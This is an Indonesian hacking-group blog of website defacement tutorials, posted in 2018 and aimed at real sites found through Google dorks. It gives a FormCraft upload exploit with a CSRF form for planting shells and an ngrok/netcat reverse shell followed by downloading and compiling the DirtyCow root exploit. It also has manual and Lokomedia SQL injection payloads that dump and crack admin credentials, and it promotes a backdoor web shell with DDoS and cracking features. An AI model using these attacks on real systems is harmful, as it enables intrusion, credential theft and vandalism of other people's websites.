Advertisement

Wednesday, April 11, 2018

DEFACE MENGGUNAKAN ADMIN BYPASS WITH NOREDIRECT


Download NoRedirect :Disini
Dork :  inurl:pk/products.php?maid=
Kembangin gan :vExploit : /admin/home.php

Langkah-langkah :

  • Seperti biasa kita dorking dlu di google
  • Lalu kita pilih salah satu webnya
  • Setelah kita pilih webnya kita masukkan exploitnya
  • Lalu kita masukkan link web yg vuln itu ke addons NoRedirect
    Addons Noredirect
  • Lalu tinggal klik add
  • Setelah itu kita ganti linknya yg ditambahkan dari site/admin/index.php menjadi site/admin/home.php
    • Sekarang tinggal cari tempat upload & upload shellnya

Saturday, March 10, 2018

Mini Tools Hallucination Cyber

Hai sobat kembali dengan saya yaitu The WTJ
Kali ini saya akan membagikan tautan mini tools dari hallucination cyber yang dibuat dan direcode oleh saya sendiri
Lansung saja klik link dibawah ini


User : Hallucination
Password : Cyber


#Thanks To Allah SWT

Thursday, March 1, 2018

Cara Deface FormCraft File upload

              Cara Deface FormCraft File Upload

Hai gaes ketemu lagi sama Mr.Greatskiller
 udah lama gak post
Biasa faktor males :v
Langsung ae
Dork :
- inurl:"wp-content//plugins/formcraft/"
- inurl:"wp-content//plugins/formcraft/" site:.de
(sisanya kembangin lagi ya Om dorknya, biar dapet banyak web Vuln and Verawan :v wkwkw )

Exploit :

1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/


Script CSRF :
<br />
<form action="http://www.target.co.li/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data" method="POST">
<input name="files[]" type="file" /><button>Upload</button>
</form>
*Save AS: .html
*ganti target.co.li ~&gt; menjadi url link target sobat

Cari target menggunakan dork di atas
Lalu masukkan exploitnya
Sekarang tinggal apa ? Ya lo masukin target csrf lah lu upload shell atau script lo

Shell Access :
target.co.li/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php

Saturday, February 24, 2018

Cara Rooting Server Dengan Ngrok

Hai kembali lagi dengan saya The WTJ
Kali ini saya akan share cara rooting server dengan ngrok
Oke langsung saja

Bahan :
Ngrok.exe, jika belum mengerti silahkan kesini
Netcat download disini
Shell yang sudah tertanam

NB : Taruh file ngrok.exe dan netcat di desktop agar mudah dipanggil

Cara :
1. buka cmd ketik dan ketik
  • cd desktop 
  • ngrok.exe tcp 123


2. Pada folder netcat saya rename jadi nc agar mudah, lalu buka cmd lagi dan ketik 
  • cd desktop
  • cd nc
  • nc -lnvp 123 


3. Masuk ke shell, disini saya pake shell wso, klik network dan isi server dengan 0.tcp.ngrok.io dan portnya sesuai yang keluar di cmd, lihat gambar dibawah



4. Klik submit, jika sudah nanti keluar kata-kata seperti gambar di bawah ini


5. Lalu klik cmd yang isinya netcat, jika berhasil akan seperti gambar dibawah ini


 6. Lalu copy paste python -c 'import pty; pty.spawn("/bin/sh")'


7. Lalu copy paste wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c --no-check-certificate


 8. Lalu copy paste gcc -pthread dirty.c -o dirty -lcrypt



9. Lalu ketik chmod +x dirty
10. Lalu ketik ./dirty
11. Terakhir masukkan password sesuka hatimu

Untuk melihat sudah diroot atau belum, tinggal ketik di cmd :
1. python -c 'import pty; pty.spawn("/bin/sh")' 
2. ssh firefart@localhost
3. masukkan paswordnya 
Selesai :)

Friday, February 23, 2018

Cara Install Ngrok Di Windows

Hai kembali lagi dengan saya The WTJ
Kali ini saya akan share cara install ngrok di windows

Pertama-tama kita harus download dan daftar ngrok disini
Jika sudah extract filenya lalu pindahkan ke desktop agar mudah dipanggil
Lalu buka cmd dan ketik
  • cd desktop
  • ngrok.exe tcp 123 
  • ngrok.exe authtoken token_lu
ambil token lu pas daftar di website ngroknya dan selesai


Sunday, January 28, 2018

Deface dengan SQL Injection (Manual)


Yo yo Watsap Guys ! balik lagi dengan gua ./MaleGhost, kali ini gua akan share tutorial deface dengan metode SQL injection (Manual)

SQL Injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya. SQL Injection digunakan untuk berkomunikasi dengan database website


Deface SQL Injection [ Manual ]

1. Menemukan SQL injection situs rentan 

Dorking :
- inurl:? index.php id =
- inurl:? admin.php id =
- inurl:? pages.php id =

- inurl:? pages.php id =

Kembangin Dork Pake Otak Dengkulmu ! :v


copy dan paste salah satu script di Google seperti inurl:? id = index.php


2. Pilih salah Satu Web

Contoh => www.target.com/index.php?id=1



3. Sekarang Anda harus menambahkan ( ') pada akhir URL 


contoh => www.target.com/index.php?id=1 '

jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.


4.  Sekarang kita harus mencari jumlah kolom


www.target.com/index.php?id=1 order by 10-- (ERROR)

www.target.com/index.php?id=1 order by 9-- (ERROR)

www.target.com/index.php?id=1 order by 8-- (ERROR)

www.target.com/index.php?id=1 order by 7-- (NO ERROR)


jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7


5. Sekarang kita harus menemukan kolom rentan 


serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--

jika menunjukkan angka 2 kolom maka rentan adalah 2



6.  kita harus menemukan versi database 


www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--

Mengganti kolom rentan dengan "@@ version"

jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya



7.  Sekarang menemukan nama database


serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--



ia akan menampilkan nama data base biarkan nama data base adalah "dunia"



8. Sekarang menemukan nama semua tabel 


union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -


ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel

biarkan kita menemukan nama tabel "administrator"



9. Sekarang kita harus mencari nama kolom


union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang () 

kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password

biarkan kita memiliki nama dua kolom user_name dan pass_word.



10.  Sekarang menemukan password dari user_name 


www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator


itu akan menampilkan username dan password

itu akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi

untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk atau 
https://hashkiller.co.uk/



Sekian dulu Posting gua mengenai SQL Injection (Manual),
Semoga Berfaedah.

- Hallucination Cyber Official Members -
● ./MaleGhost ● ./p0tz ● The WTJ ● Mr.Greatskiller ● p0r7s ● ZeebXploit ● Nebulous.ID ● Mr.HO4X ● Mr.N0tC0ntent ● ./Mr.KindoL ● Juansimon666 ● MR.G4RF1LD ● ./Me404_ID ●

Cara Deface SQL Lokomedia (New Dork 2018)

Sore TOT

w disini akan buat tutor cara depes metode SQL Lokomedia ,, oke ga usah kakean bacot langsung ae

Bahan Bahan : 
1 . Dork : Sentuh Aku Mas
2 . SC Pepes : Touched
3 . Shell Backdoor : ewe.
4 . Purel
5 . Kimcil :v

1 . Dorking With search engine

2 . Pilih Salah 1 web yang ingin di eue

3 . Lalu Masukkan Exploit na Di target

Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Contoh Web : http://www.coly.sch.id/statis-22-kerjasama.html ,,( exploit Di belakang Nomor ) 

Contoh : http://www.asedekentot:v.com/statis-22'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-kerjasama.html


Kalaw web na uda di exploit akan macam sperti ini



4 . Untuk Melihat User Dan password website kita tekan CTRL + U Biar lebih jelas


Dan Terlihat User : smarihast4 dan Pasword : c27e2f241869a7fde7092d7e91452441 , karena password masih dalam bentuk MD5 maka harus di decrypt , Dan untuk decrypt password md5 saya menggunakan hashkiller , Dan Kalian Bisa gunakan tools / aplikasi lain untung decrypt

Decrypt passowrd onlen : touch

Dan Skearang coba kita hash passoword na

Dan Hasilnya


Dan password : Veteran37

5 . Langkah Terakhir Kita Akan Mencari Admin login

Untuk Admin Login : 

/adm

/adminweb

/administrator

/redaktur



Dan Kalian Bisa Scan admin login dengan admin finder onlen

Untuk Admin finder : sentuh



Dan Kalau Sudah Kita akan login Dengan User / password tad


user:admin

pw:Veteran37





Dan Kalau Sudah Login Kamu akan Di arah kan ke dashboard 



Dan Taraa ,, Kamu Sudah berhasil masuk ke dashboard ...
Langkah terakhir kamu Cari tempat upload untuk Tempat upload shell kamu


Skarang upload shell kamu 


Dan Shell berhasil di tanam Dan bisa di acses :v

Akses shell tinggal klik kanan pada gambar yang udah di up shell

* Untuk kendala Tidak bisa upload shell dengan extensi .php .phtml .php5 kita bisa tamper menggunakan burpsuite 




Sekian tutor sql lokomedia iny smoga brmanfaat :v
byeeee..cok :V



Saturday, January 27, 2018

J3MB0D404 Shell Backdoor Released

Sell backdoorrrr JEMBOD404 Released

Tampilan Shell na :v


Tampilan Login Shell Na :v ( cocok nich yg mau nge hidden shell na,tanpa ribed )





Fitur :
- Mass Deface
- Config
- Jumping (With Domain)
- Zone-H Mass Poster
- Defacer ID Mass Poster
- CGI Telnet
- Cpanel Crack
- SMTP Grabber
- Encode / Decode
- Bypass Vhost
- CMS Detector
- Tool's port Scanner
- Symlink
- VB Index Changer
- Whois
- Adminer
- Database Dump
- Fake Root
- Auto Edit User
- Auto Edit Title Wordpress
- Wordpress Auto Deface
- Wodpress Auto Deface V2
- Bypass Etc/Password
- Log Hunter
- Shell Checker (By Cr1p's)
- Config Fucker
- Cpanel/Ftp Auto Deface
- K-Rdp Shell
- Network / BackConnect
- Config Grabber ( Apabila Config Di Atas Error )
- Auto Exploiter Lokomedia
- CSRF Exploiter
- WHMCS Password Decoder
- BruteForce Twitter
- Symlink 2 Dilengkapi Bypass Symlink
- Joomla Auto Edit User
- Wordpress Auto Edit User V.2
- WP - Auto - Hijack
- Dorking Tools
- Bing Grabber
- HashID
- Admin Finder
- IpLookUp
- Prestashop Exploiter
- Magento Exploiter
- DDOS
- Sql Scan (Error)(Blm Gw Perbaiki)
- Joomla Server Scanner
- Hidden Login Shell
etc.

Donwlot shell na : toch | t0ch

Password shell : kwen7od


Sekian ea :v

Recoded by : Rinto AR
Thanks to : IndoXploit,XaiSyndicate,RintoAR